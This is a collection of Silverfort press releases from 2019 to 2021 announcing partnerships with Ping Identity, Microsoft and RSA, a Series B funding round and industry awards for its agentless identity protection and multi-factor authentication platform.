Media Contact: Marc Gendron, Marc Gendron PR for Silverfort, marc@mgpr.net, 781.237.0341

---
- Published: 2021-06-21
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-ping-identity-unify-rba-across-cloud-hybrid-environment/

Product Integration Provides Comprehensive Visibility and Assessment of Access Activity that Enables Customers to Identify and Respond to Threats

Boston and Tel Aviv, June 21, 2021 – Silverfort, the unified identity protection company, today announced that it has joined forces with Ping Identity to help customers unify risk analysis of authentication and access attempts across on-premises and multi-cloud environments to detect and prevent identity-based attacks.

According to the Verizon 2021 Data Breach Investigations Report, 61 percent of breaches are attributed to compromised credentials, which is the primary means by which hackers access sensitive data. The integration of the Silverfort platform with PingFederate enables organizations to apply universal risk-based monitoring and assessment of authentication activity for on-premises and cloud environments, and proactively prevent threats. The combined solution also makes it possible to extend identity-based controls to previously unprotected on-premises resources including servers and workstations, homegrown legacy apps, file shares and more. These capabilities can detect advanced attacks in hybrid environments with unmatched accuracy, trigger security policy enforcement and maintain a friction-free user experience.

“The Silverfort and Ping Identity integration enables customers to implement zero trust identity security while providing seamless authentication experiences for users,” said Loren Russon, VP of Product Management at Ping Identity. “Whether applications are in the cloud, on-premises, federated or hybrid, Ping Identity and Silverfort make it possible to see the true context of authentication with AI-based risk analysis and apply adaptive access policies that defend against identity related security threats.”

“Detecting risky authentication and access requests across hybrid and cloud environments requires a unified approach that can span multiple identity providers and data silos,” said Yaron Kassner, CTO of Silverfort. “The combination of Silverfort and Ping Identity provides the visibility, risk analysis and policy enforcement needed to detect and respond to identity-based threats, while remaining transparent to authorized users.”

The Silverfort-PingFederate integration provides the following benefits:

- Transparently redirects authentication requests from all applications federated by PingFederate to the Silverfort platform for risk analysis
- Silverfort evaluates each request based on the full context of the user account, including its recent on-premises authentication and access activity
- If risky behavior is detected, Silverfort applies an access policy that is enforced across the customer’s entire environment, including on-premises, cloud and multi-cloud
- Provides protection against lateral movement by attackers across hybrid infrastructures as well as full visibility and an audit trail of each user’s authentication activity

On Tuesday, June 22 from 1:30pm - 1:55pm MDT, Yaron Kassner will present a virtual session at the Ping Identity Identiverse conference entitled "Why Lateral Movement is an Identity-Based Attack."

Availability

The Silverfort and PingFederate solutions are available immediately from Silverfort and Ping Identity, respectively, and their business partners worldwide.

About Silverfort

Silverfort is the provider of the first Unified Identity Protection Platform that consolidates IAM security controls across corporate networks and cloud environments to block identity-based attacks.
Using innovative agentless and proxyless technology, Silverfort seamlessly integrates with all IAM solutions, unifies their risk analysis and security controls, and extends their coverage to assets that could not be protected until today, such as homegrown and legacy applications, IT infrastructure, file systems, command-line tools, machine-to-machine access and more. The company has been named a Gartner ‘Cool Vendor’, a 451 Research ‘FireStarter’, and a CNBC ‘Upstart 100’. To learn more visit us on the web, and follow us on LinkedIn and Twitter.

About Ping Identity

Ping Identity is the Intelligent Identity solution for the enterprise. We enable companies to achieve Zero Trust identity-defined security and more personalized, streamlined user experiences. The Ping Intelligent Identity™ platform provides customers, workforce, and partners with access to cloud, mobile, SaaS and on-premises applications across the hybrid enterprise. Over 60% of the Fortune 100 choose us for our identity expertise, open standards, and partnerships with companies including Microsoft and Amazon. We provide flexible identity solutions that accelerate digital business initiatives, delight customers, and secure the enterprise through multi-factor authentication, single sign-on, access management, intelligent API security, directory, and data governance capabilities. For more information, visit www.pingidentity.com.

Media Contact: Marc Gendron, Marc Gendron PR for Silverfort, marc@mgpr.net, 781.237.0341

---
- Published: 2021-03-17
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-microsoft-security-20-20-partner-awards-finalist-identity-trailblazer/

Company’s Unified Identity Protection Platform Consolidates Security Controls for On-Premises and Cloud Environments to Block Attacks

Boston and Tel Aviv, March 17, 2021 – Silverfort, the unified identity protection company, today announced it has been named a finalist for the Microsoft Security 20/20 Identity Trailblazer award. The company was honored among a global field of industry leaders for demonstrating excellence in innovation, integration, and customer implementation with Microsoft technology.

“Being named a finalist for the Microsoft Security 20/20 Award provides further validation for the value we provide joint customers by unifying identity protection across all their assets,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “Enforcing access management and authentication policies on all resources across hybrid and multi-cloud environments is necessary for implementing Zero Trust security. Silverfort makes this possible by ‘bridging’ any kind of application, server or device into Entra ID (formerly Azure AD), without modifying those assets and without installing proxies.”

The second annual Microsoft Security 20/20 awards to be held May 12, 2021, will celebrate finalists in 18 categories spanning security, compliance, and identity. Silverfort has been nominated as a finalist for Identity Trailblazer.

“The pandemic has forever changed our perspective on the world, the role of technology, and how we work, learn, and live,” said Rani Lofstrom, Senior Product Marketing Manager, Microsoft Global Security Partnerships. “In recognition of our new reality, the theme for the Microsoft Security 20/20 Awards this year is ‘Perspective—Through the Looking Glass.’ The awards ceremony this year will honor our security partners who have gone above and beyond during an unprecedented time of change to support, secure, and protect remote workers everywhere.”

The Microsoft Intelligent Security Association (MISA) was established to help further the security ecosystem, fostering an environment where solution providers can collaborate to create a future that’s safer for people and organizations alike. This year, the industry veterans in MISA will vote to select the winners of the Microsoft Security 20/20 awards, providing an opportunity for colleagues to honor their peers for delivering exceptional work to our shared customers.

About Silverfort

Silverfort is the provider of the first Unified Identity Protection Platform that consolidates IAM security controls across corporate networks and cloud environments to block identity-based attacks. Using innovative agentless and proxyless technology, Silverfort seamlessly integrates with all IAM solutions, unifies their risk analysis and security controls, and extends their coverage to assets that could not be protected until today, such as homegrown and legacy applications, IT infrastructure, file systems, command-line tools, machine-to-machine access and more. The company has been named a Gartner ‘Cool Vendor’, a 451 Research ‘FireStarter’, and a CNBC ‘Upstart 100’. To learn more visit us on the web, and follow us on LinkedIn and Twitter.

Media Contact: Marc Gendron, Marc Gendron PR for Silverfort, marc@mgpr.net, 617.877.7480

---
- Published: 2021-03-01
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/unified-identity-protection-for-azure-ad/

Platform Enables Organizations to Centralize Identity and Access Management (IAM) for Cloud and Legacy On-premises Resources on Azure Active Directory, Including Those That Couldn’t be Migrated Before

Boston and Tel Aviv, March 2, 2021 – Silverfort, a unified identity protection company and member of the Microsoft Intelligent Security Association (MISA), announced a new offering that enables organizations to consolidate Identity and Access Management for all their devices, applications and environments on Microsoft Entra ID. This new solution is being showcased during a virtual live session at Microsoft Ignite and follows dozens of enterprise customer wins involving Silverfort’s core platform over the past several months.

The Silverfort Unified Identity Protection platform allows customers to migrate all their hybrid assets, including non-web systems, into Entra ID (formerly Azure AD) where they can be centrally managed as if they were modern web applications. This enables organizations to unify security policies, visibility and user experience across all systems and environments, including legacy on-premises resources that do not natively support integration with Entra ID (formerly Azure AD) or existing application proxies.

“Identity is becoming the primary security control plane for enterprises, but it’s currently built in silos, lacking unified control and leaving many sensitive assets exposed,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “Entra ID provides advanced IAM visibility and security and Silverfort now extends its coverage far beyond any other IAM solution, enabling unified identity protection. We are excited to collaborate with Microsoft on this solution that we think will benefit every enterprise.”

“Microsoft has been on a mission to help companies protect their corporate identities, and take advantage of Entra ID as a universal identity platform for the modern workforce,” said Sue Bohn, Partner Director, Microsoft Identity Division at Microsoft Corp. “The integration with Silverfort allows customers to extend the power and flexibility of Entra ID to many additional resources and applications across hybrid and multi-cloud environments, and unify their identity management and protection on Azure AD.”

Silverfort uses agentless and proxyless technology to seamlessly connect with IAM solutions across hybrid environments, and automatically discovers and analyzes applications and resources, including those that still rely on passwords and legacy protocols. The platform accelerates and optimizes the migration of all applications to cloud-native identity platforms like Entra ID, while serving as a ‘bridge’ for assets that could not be migrated before, such as:

- Legacy and homegrown applications
- IT infrastructure
- Active Directory managed servers and endpoints
- Assets that reside on other cloud environments, including multi-cloud
- File shares and databases
- Command-line tools and other admin interfaces
- Machine-to-machine access (service accounts)
- Industrial and medical systems

About Silverfort

Silverfort is the provider of the first Unified Identity Protection Platform that consolidates IAM security controls across corporate networks and cloud environments to block identity-based attacks. Using innovative agentless and proxyless technology, Silverfort seamlessly integrates with all IAM solutions, unifies their risk analysis and security controls, and extends their coverage to assets that could not be protected until today, such as homegrown and legacy applications, IT infrastructure, file systems, command-line tools, machine-to-machine access and more. The company has been named a Gartner ‘Cool Vendor’, a 451 Research ‘FireStarter’, and a CNBC ‘Upstart 100’.
To learn more visit Silverfort.com, and follow us on LinkedIn and Twitter.

Media Contact: Marc Gendron, Marc Gendron PR for Silverfort, marc@mgpr.net, 781.237.0341

---
- Published: 2021-01-18
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/the-future-of-work-security-and-women-in-tech-2/

Aleta Jeffress (Status Go Episode 3) returns to discuss what’s changed... and what hasn’t changed in the last two years. Aleta is the Vice President of Consulting Services in the State and Local Government sector for CGI. Aleta discusses the heroic efforts many IT departments made in enabling a remote workforce in the new reality of work from home. Security is always top of mind, never more so than in 2020. We explore some of the recent news of the government hacks and what the future may bring in the areas of security and work from home. Aleta also brings us up to date on the work she has been doing to promote women in technology roles, especially in the area of security. Along the way we discuss a couple of interesting start-ups bringing a new perspective to security and to bias in hiring.

Discussed in this episode:

- Future of Work Webinar
- Silverfort – Next Generation Authentication
- InterviewIA – AI analysis of interviewing

The Future of Work, Security and Women in Tech

---
- Published: 2020-08-04
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-secures-30-million-in-series-b-funding/

Boston, Tel Aviv, August 4th, 2020 - Silverfort, provider of the industry’s first agentless, proxyless authentication platform, announced today that it has raised $30 million in a Series B investment round. The new funding will allow Silverfort to further accelerate the company’s fast growth and meet the increasing customer demand for secure authentication and access solutions, which is boosted by the global shift to remote work.
The financing was led by Aspect Ventures, with participation of Citi Ventures, Maor Investments, and the company’s early investors TLV Partners, StageOne Ventures and Singtel Innov8. Mark Kraynak from Aspect Ventures will be joining Silverfort’s board of directors. This funding round follows a milestone year of growth for Silverfort and brings the total investments in the company to $41.5 million.

“The shift to hybrid and multi-cloud environments, combined with the dramatic acceleration of remote work is driving the need for secure authentication and access of corporate users beyond the perimeter,” said Mark Kraynak, Venture Partner with Aspect Ventures. “Implementing these security controls system-by-system is no longer realistic. Silverfort brings a disruptive technology that is uniquely designed for the perimeter-less era. We are very impressed by the company’s customer traction, leadership and product vision, and excited to help it accelerate its growth.”

“We are proud to support Silverfort as investors, and to see a market leader come out of Citi’s Accelerator program” says Ornit Shinar, Head of Ventures Investments in Citi Israel. “Silverfort's solution has proven not only to be valuable, but in many cases, a necessity. Especially these days, when millions of people around the world have to work and access corporate resources remotely.”

Silverfort developed an innovative platform that seamlessly enforces secure authentication and access policies (including Multi-Factor Authentication, Risk-Based Authentication, Zero Trust and more) for any user, device and system, both on-premises and in the cloud, without the need to deploy any agents, SDKs or proxies. Its unique architecture allows Silverfort to protect large and complex networks and cloud environments in a unified manner, with an AI-driven risk engine that automatically adjusts policies based on the user’s behavior, and prevents threats such as account takeover, ransomware and lateral movement.
“With the shift to remote working, secure employee authentication and access to company networks and systems have grown increasingly important for enterprises,” said William Woo, Group CIO at Singtel. “However, many large enterprises find it difficult to implement such controls across all their different environments quickly. Silverfort’s innovative solution simplifies this process without requiring system modifications, enabling them to save time and costs.”

Want to know more? Join us on August 25th for a live webinar introducing Silverfort's Agentless Authentication Platform

Silverfort enables its customers to protect many sensitive systems that other vendors can’t integrate with, such as homegrown/legacy systems, critical infrastructure, file systems, IoT, command-line interfaces, machine-to-machine access and more. Silverfort also allows customers to migrate their existing servers and applications to the cloud in a secure manner without having to modify them.

“We are thrilled to have the support of such great investors who share our vision,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “The increased enterprise adoption of cloud, IoT, BYOD and remote work is creating major challenges for implementing secure authentication and access, and calls for a more unified approach. We are excited to continue on our mission to help more companies leverage identity as their new perimeter, and effectively prevent emerging cyber threats.”

Silverfort was founded by Hed Kovetz, Yaron Kassner and Matan Fattal, cybersecurity and cryptography experts who previously served in the Israeli 8200 elite cyber unit. It has large enterprise customers around the world, and partnerships with top security vendors and channel partners. This additional funding will allow Silverfort to expand its sales, marketing, engineering and customer success teams around the world.
About Silverfort:

Silverfort delivers secure authentication and Zero Trust policies across corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables risk-based multi-factor authentication for all sensitive users, devices and resources, including systems that could not be protected until today, such as homegrown applications, IT infrastructure, file systems, machine-to-machine access and more. Silverfort allows organizations to prevent data breaches and achieve compliance, by preventing identity-based attacks across complex, dynamic networks and cloud environments. The company has been named a Gartner ‘Cool Vendor’, a 451 Research ‘FireStarter’, and a CNBC ‘Upstart 100’, and has received worldwide recognition and awards, including Citi’s Most Promising Fintech Startups for 2020 in the Cybersecurity Category, Most Promising Cybersecurity Startup of the Year by CDM Magazine, and more. Contact us to learn more.

---

- Published: 2020-05-03
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-breakthrough-in-mfa-hebrew/

In today's new world, where nearly everyone is working remotely, passwords just aren't enough to keep your company’s sensitive assets secure. Check out the full article on Silverfort & CEO, Hed Kovetz, here:

---

- Published: 2020-03-10
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/the-silverfort-story-the-next-chapter/

During RSA Conference, we had a chance to connect with Dana Tamir from Silverfort to get the updated Silverfort story. During our chat, Dana points out that enabling secure authentication and zero trust policies without requiring an agent or proxies or software changes should be the primary goal for organizations looking to keep bad actors out while ensuring secure access to those that have been granted authorized access to the business resources.
Listen to the podcast

---

- Published: 2020-03-05
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/addressing-iam-pain-points-and-security-gaps/

Hed Kovetz of Silverfort Reviews Holistic Agentless Approach to Secure Authentication

---

- Published: 2020-02-24
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-named-winner-of-the-coveted-infosec-award-most-promising-cybersecurity-startup-of-the-year-during-rsa-conference-2020/

Silverfort’s Agentless Authentication Platform wins ‘Most Innovative Identity and Access Management’ In 8th Annual InfoSec Awards at #RSAC 2020

SAN FRANCISCO (PRWEB), Feb. 24, 2020 — Silverfort, provider of an agentless secure authentication platform, is proud to announce we have won the following awards from Cyber Defense Magazine (CDM), the industry’s leading electronic information security magazine:

- Most Promising Cybersecurity Startup of the Year
- Most Innovative Identity and Access Management

“We’re thrilled to receive one of the most prestigious and coveted cybersecurity awards in the world from Cyber Defense Magazine. We knew the competition would be tough and fierce. We couldn’t be more pleased to be recognized as Infosec Innovators and leaders in the industry,” said Hed Kovetz, CEO and Co-Founder of Silverfort.

“Silverfort embodies three major features the judges look for to become winners: understanding tomorrow’s threats, today, providing a cost-effective solution and innovating in unexpected ways that can help stop the next breach,” said Gary S. Miliefsky, Publisher of Cyber Defense Magazine.

We’re thrilled to be a member of this coveted group of winners, located here: http://www.cyberdefenseawards.com/

Please join us at #RSAC RSA Conference 2020, https://www.rsaconference.com/usa today, as we share our red carpet experience and proudly display our trophy at Booth #1553 in South Hall.
About Silverfort

Silverfort delivers secure authentication and Zero Trust across corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables risk-based multi-factor authentication for all sensitive users, devices and resources, including systems that could not be protected until today, such as homegrown applications, IT infrastructure, file systems, machine-to-machine access and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks and cloud environments. The company has been named a CNBC ‘Upstart 100’, Gartner ‘Cool Vendor’, a 451 Research ‘FireStarter’, and received worldwide recognition, including the Most Innovative Adaptive Authentication InfoSec Award 2019, InfoSecurity 2018 Global Excellence Awards for Best Authentication Product, and is a gold winner of the Cybersecurity Excellence Awards in the Multi-Factor Authentication category. Contact us to learn more.

About CDM InfoSec Awards

This is Cyber Defense Magazine’s eighth year of honoring InfoSec innovators. Our submission requirements are for any startup, early stage, later stage or public companies in the INFORMATION SECURITY (INFOSEC) space who believe they have a unique and compelling value proposition for their product or service. Learn more at www.cyberdefenseawards.com

About the Judging

The judges are CISSP, FMDHS, CEH, certified security professionals who voted based on their independent review of the company submitted materials on the website of each submission including but not limited to data sheets, white papers, product literature and other market variables. CDM has a flexible philosophy to find more innovative players with new and unique technologies, than the one with the most customers or money in the bank. CDM is always asking “What’s Next?” so we are looking for Next Generation InfoSec Solutions.

About Cyber Defense Magazine

With over 5 Million monthly readers and growing, and over 17,000 pages of searchable online infosec content, Cyber Defense Magazine and our sister magazine being announced after the show is the premier source of IT Security information. We are managed and published by and for ethical, honest, passionate information security professionals. Our mission is to share cutting-edge knowledge, real-world stories and awards on the best ideas, products and services in the information technology industry. We deliver electronic magazines every month online for free, and special editions exclusively for the RSA Conference. CDM is a proud member of the Cyber Defense Media Group, a division of Ingersoll Lockwood. Learn more about us at http://www.cyberdefensemagazine.com and visit http://www.cyberdefensetv.com and http://www.cyberdefenseradio.com to see and hear some of the most informative interviews of many of these winning company executives.

---

- Published: 2019-12-17
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-recognized-as-a-microsoft-security-20-20-partner-awards-finalist-for-emerging-isv-disruptor/

BOSTON, MA and Tel Aviv, Israel Dec. 17, 2019 — Silverfort today announced it has been named a finalist in the Microsoft Security 20/20 Partner award. The company was honored among a global field of top Microsoft partners for demonstrating excellence in innovation, integration, and customer implementation with Microsoft technology.

“We are honored by this recognition, and excited to be working with Microsoft to enable secure authentication and access in the perimeterless cloud era,” said Hed Kovetz, Co-Founder and CEO of Silverfort. “In our current reality, enterprises can no longer secure assets one-by-one, or rely solely on perimeter-based security solutions.
Silverfort seamlessly extends Microsoft’s identity products to any type of asset, across dynamic hybrid environments, without requiring any agents or proxies. By leveraging our powerful integrations and thanks to the Microsoft Co-Sell Partner Program, we enable companies around the world to migrate their existing assets securely to the cloud, without making changes to their systems or networks.”

At the inaugural Microsoft Security 20/20 partner awards, we will celebrate finalists in 16 categories that span security integration partners, system integrators and managed security service providers. Silverfort has been nominated as a finalist for Emerging ISV Disruptor.

“The themes for the new Microsoft Security 20/20 partner awards are vision and clarity. Microsoft Security is focused on protecting our customers and there is no vision for the future that doesn’t involve security partners,” said Rob Lefferts, CVP, Microsoft Threat Protection. “We are hosting the first Microsoft Security 20/20 partner awards gala to honor security partners that are making an impact through technology development and customer enablement.”

Only through collaborations can organizations help customers get clarity and become more secure. The security ecosystem must work together to create a vision for the future where people, information, and companies are made safer. Microsoft Security 20/20 provides an opportunity to honor Microsoft partners that have developed and delivered exceptional Microsoft-based solutions and services during the past year.

About Silverfort

Silverfort delivers secure authentication and Zero Trust across corporate networks and cloud environments, without deploying any software agents or inline proxies.
Using patent-pending technology, Silverfort enables risk-based multi-factor authentication for all sensitive users, devices and resources, including systems that could not be protected until today, such as homegrown applications, IT infrastructure, file systems, machine-to-machine access and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks and cloud environments. The company has been named a CNBC ‘Upstart 100’, Gartner ‘Cool Vendor’, a 451 Research ‘FireStarter’, and received worldwide recognition, including the Most Innovative Adaptive Authentication InfoSec Award 2019, InfoSecurity 2018 Global Excellence Awards for Best Authentication Product, and is a gold winner of the Cybersecurity Excellence Awards in the Multi-Factor Authentication category. Contact us to learn more.

Product or service names mentioned herein may be the trademarks of their respective owners.

Media Contact:
Dan Chmielewski
Madison Alexander PR
714-832-8716
949-231-2965

---

- Published: 2019-10-22
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-joins-the-microsoft-intelligent-security-association/

After Announcing a Co-Sell Partnership, the Companies Strengthen Their Relationship to Drive Secure Authentication in the Perimeter-less Cloud Era.

October 22, 2019 06:00 AM Eastern Daylight Time

BOSTON & TEL AVIV, Israel--(BUSINESS WIRE)-Silverfort, the provider of agentless authentication and Zero-Trust security solutions, announced today that it has joined the Microsoft Intelligent Security Association, a collaborative ecosystem of independent software vendors that have integrated their security solutions to provide better security for our mutual customers. Silverfort collaborates with Microsoft and other Association members to create a unified AI-driven authentication platform.
Thanks to patent-pending technology and integrations with Microsoft’s identity products, including Azure Active Directory, Silverfort seamlessly delivers secure authentication and ‘Zero Trust’ security policies across all sensitive corporate assets, both on-premises and in the cloud, without the need to install any agents or proxies. This allows enterprises to protect critical assets that don’t support secure authentication today, and to migrate legacy servers and applications to the cloud (‘Lift-and-Shift’) without worrying about unauthorized access.

“We are proud to strengthen our partnership with Microsoft and to join this important initiative,” said Hed Kovetz, CEO and Co-Founder at Silverfort. “Together with Microsoft we solve one of the top barriers for cloud migration, by seamlessly enabling secure authentication and access for any digital asset, including legacy and homegrown systems that enterprises are looking to migrate to the cloud without compromising on security.”

“We are delighted to welcome Silverfort to the Microsoft Intelligent Security Association,” says Ryan McGee, director of security product marketing, Microsoft. “The cloud era has changed how we have to think about security, where identity is the new control plane. This creates a growing need for delivering secure authentication across dynamic hybrid environments and helping organizations migrate their assets securely to the cloud. We are pleased that Silverfort integrates with Microsoft’s identity products to support this goal.”

Silverfort is also a member of Microsoft’s co-sell program and works with Microsoft’s sales teams to deliver next-generation authentication to Microsoft customers and partners around the world, protect authentication to sensitive assets they could not protect until today and enable secure migration of proprietary systems to Azure.

To learn more about Silverfort’s Agentless Authentication Platform and how it enables Risk-Based Zero-Trust policies – visit www.Silverfort.com

About Silverfort

Silverfort delivers secure authentication and Zero Trust across corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables risk-based multi-factor authentication for all sensitive users, devices and resources, including systems that could not be protected until today, such as homegrown applications, IT infrastructure, file systems, machine-to-machine access and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks and cloud environments. The company has been named a Gartner ‘Cool Vendor’ and received worldwide recognition, including the Most Innovative Adaptive Authentication InfoSec Award 2019, InfoSecurity 2018 Global Excellence Awards for Best Authentication Product, and is a gold winner of the Cybersecurity Excellence Awards in the Multi-Factor Authentication category. Contact us to learn more.

Media Contact:
Dan Chmielewski
Madison Alexander PR
714-832-8716
949-231-2965
dchm@madisonalexanderpr.com

---

- Published: 2019-09-26
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-recognized-by-451-research-as-a-451-firestarter/

Provider of agentless, proxyless authentication platform recognized by leading analyst firm for innovation and vision in the technology industry

BOSTON, MA and Tel Aviv, Israel Sept. 26, 2019 — Silverfort, the provider of Next-Generation Authentication solutions, today announced it has received a 451 Firestarter award from leading technology research and advisory firm 451 Research, recognizing the company’s innovative contribution within the technology industry. 451 Research’s Firestarter program recognizes exceptional innovation within the information technology industry.
Introduced in 2018, and awarded quarterly, the program is exclusively analyst-led, allowing its team of technology and market experts to highlight organizations they believe are significantly contributing to the overall pace and extent of innovation in the technology market.

“We are honored to be recognized as a ‘451 Firestarter’ and to receive this recognition for our technology and vision,” says Hed Kovetz, Silverfort Co-Founder and CEO. “This award validates our mission to enable seamless secure authentication and Zero Trust in today’s perimeterless enterprise networks and cloud environments, allowing enterprises to secure any sensitive system or resource with a holistic approach that does not require any software agents or proxies.”

“With the growth of cloud services and applications, IoT devices, and mobility, everything is connected to everything, which implies that authentication needs to take place nearly everywhere” said Garrett Bekker, 451 Research. “Silverfort’s no-agent, no-proxy approach to risk-based authentication can be applied to a broad range of assets and computing frameworks (public cloud, on-prem, SaaS, hybrid), and in that sense seems to lend itself particularly well to a zero-trust strategy.”

Download A Free Copy of The 451 Research 2019 FireStarter Report

About Silverfort

Silverfort delivers secure authentication and Zero Trust across corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables risk-based multi-factor authentication for all sensitive users, devices and resources, including systems that could not be protected until today, such as homegrown applications, IT infrastructure, file systems, machine-to-machine access and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks and cloud environments.
The company has been named a Gartner ‘Cool Vendor’ and received worldwide recognition, including the Most Innovative Adaptive Authentication InfoSec Award 2019, InfoSecurity 2018 Global Excellence Awards for Best Authentication Product, and is a gold winner of the Cybersecurity Excellence Awards in the Multi-Factor Authentication category. Contact us to learn more.

About 451 Research

451 Research is a leading information technology research and advisory company focusing on technology innovation and market disruption. More than 100 analysts and consultants provide essential insight to more than 2,000 client organizations globally through syndicated research, advisory services and live events. Founded in 2000 and headquartered in New York, 451 Research is a division of the 451 Group. Learn more about the 451 Research Firestarters.

For media inquiries please contact:
Dan Chmielewski
Madison Alexander PR
714-832-8716
949-231-2965

---

- Published: 2019-09-04
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-joins-rsa-ready-technology-partner-program/

Silverfort’s Agentless Authentication Platform enables joint customers to seamlessly extend RSA SecurID® Access to any sensitive system and apply Zero-Trust security policies across corporate networks and cloud environments.

September 04, 2019 06:00 AM Eastern Daylight Time

BOSTON & TEL AVIV, Israel--(BUSINESS WIRE)-Silverfort, the provider of Next-Generation Authentication solutions, today announces interoperability between Silverfort’s agentless authentication platform and RSA SecurID Access (the RSA Multi-Factor Authentication solution). The interoperability will allow joint customers to extend secure authentication to any sensitive system in any environment, including systems that could not be protected until today - without requiring software agents, proxies or code changes. Customers will also be able to implement Zero-Trust access policies without rebuilding or changing their networks.
Corporate networks have been going through dramatic changes in the past few years, due to IT revolutions such as the cloud, Internet of Things (IoT) and Bring Your Own Device (BYOD). In this new reality, with countless devices and services, all connected to each other without clear perimeters, it is critical to verify user identities before granting them access to sensitive resources, whether on-premises or in the cloud.

Silverfort introduces a next-generation authentication platform which enables secure authentication for any sensitive system, including systems that were considered “unprotectable” until today, without requiring agents, proxies or code changes. This includes homegrown applications, IT infrastructure, IoT devices, dynamic IaaS environments, machine-to-machine access and more.

Interoperability with RSA SecurID Access will leverage multi-factor authentication methods like mobile push notifications and biometrics to enable joint customers to extend the use of RSA SecurID Access to any sensitive system and address a wide variety of security use cases and regulatory compliance needs. Customers will also be able to enforce holistic Zero-Trust access policies, not only at the gateway but also inside each environment, without modifying their network architecture.

“The RSA Ready ecosystem and Silverfort together offer a powerful and unique solution that addresses fast growing security challenges in today’s enterprises,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “We are proud to become part of the RSA Ready Program and thrilled to deliver together seamless, secure authentication and Zero Trust policies suitable for today’s hybrid perimeter-less networks.”

RSA, a global cybersecurity leader delivering Business-Driven Security™ solutions to help organizations manage digital risk, provides technology partners, through the RSA Ready program, an opportunity to develop, certify and market solutions with RSA.
Together, Silverfort and the RSA Ready Partner Program will empower customers to focus on opportunities to transform their business while protecting their most valuable assets.

The Silverfort Agentless Authentication Platform is generally available and customers are welcome to schedule a demo.

About Silverfort

Silverfort delivers secure authentication and Zero Trust across corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables risk-based multi-factor authentication for all sensitive users, devices and resources, including systems that could not be protected until today, such as homegrown applications, IT infrastructure, file systems, machine-to-machine access and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks and cloud environments. The company has been named a Gartner ‘Cool Vendor’ and received worldwide recognition, including the Most Innovative Adaptive Authentication InfoSec Award 2019, InfoSecurity 2018 Global Excellence Awards for Best Authentication Product, and is a gold winner of the Cybersecurity Excellence Awards in the Multi-Factor Authentication category. Contact us to learn more.

Media Contact:
Dan Chmielewski
Madison Alexander PR
714-832-8716
949-231-2965
dchm@madisonalexanderpr.com

---

- Published: 2019-05-29
- Modified: 2024-06-05
- URL: https://www.silverfort.com/press-news/silverfort-named-a-may-2019-gartner-cool-vendor-in-identity-and-access-management/
Vendors Included in Cool Vendor Report are Interesting, New and Innovative

BOSTON, MA and Tel Aviv, Israel May 23, 2019 — Silverfort, the provider of Next Generation Authentication solutions, today announced it has been included in the “Cool Vendors in Identity and Access Management for 2019” report by Gartner, Inc. According to the report, “Digital businesses must achieve a great user experience, and support digital transformation and optimization as well as the shift of workloads to the cloud.” The report recommends that “to future-proof legacy IAM infrastructures to quickly deliver business value and support cyber defense, security and risk management leaders responsible for identity and access management should support a continuous adaptive risk and trust assessment posture by comprehensively mapping all authentication activity in an enterprise to support MFA for high-risk activity.”

Silverfort offers a unique next-generation authentication platform that can seamlessly enforce secure authentication for any user, device and asset, without requiring any software agents or proxies and without decrypting network traffic. This enables enterprises to address the new challenges introduced by the growing adoption of cloud, IoT and BYOD, which are erasing traditional network perimeters. Silverfort’s agentless and proxyless architecture enables it to protect sensitive systems that were considered “unprotectable” until today, like homegrown applications, IT infrastructure, IoT devices, dynamic IaaS environments and more. Silverfort monitors 20x-50x more access requests than other adaptive authentication solutions, and leverages a sophisticated AI-driven risk engine to continuously analyze all access activity, including user-to-machine and machine-to-machine, across on-premises and cloud environments.
“We feel that being named a Cool Vendor in Identity and Access Management by Gartner is tremendous validation of our mission to enable secure authentication and access in today’s perimeterless enterprise environments” said Hed Kovetz, Silverfort Co-Founder and CEO. “We are experiencing rapid growth as companies are rethinking their authentication strategies in this new era, as well as looking to address existing security and compliance gaps.”

To read more – see Silverfort’s blog: https://www.silverfort.com/blog/Silverfort-Named-Gartner-Cool-Vendor

Gartner subscribers can access the report here: Cool Vendors in Identity and Access Management by Felix Gaehtgens, Mary Ruddy, David Mahdi, Paul Rabinovich, Michael Kelley, Ant Allan, May 10, 2019.

Join us for a live webinar and demo on June 11th 1pm EST/10am PST - reserve your seat today:

Required Disclaimer

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

About Silverfort

Silverfort delivers strong authentication across corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more.
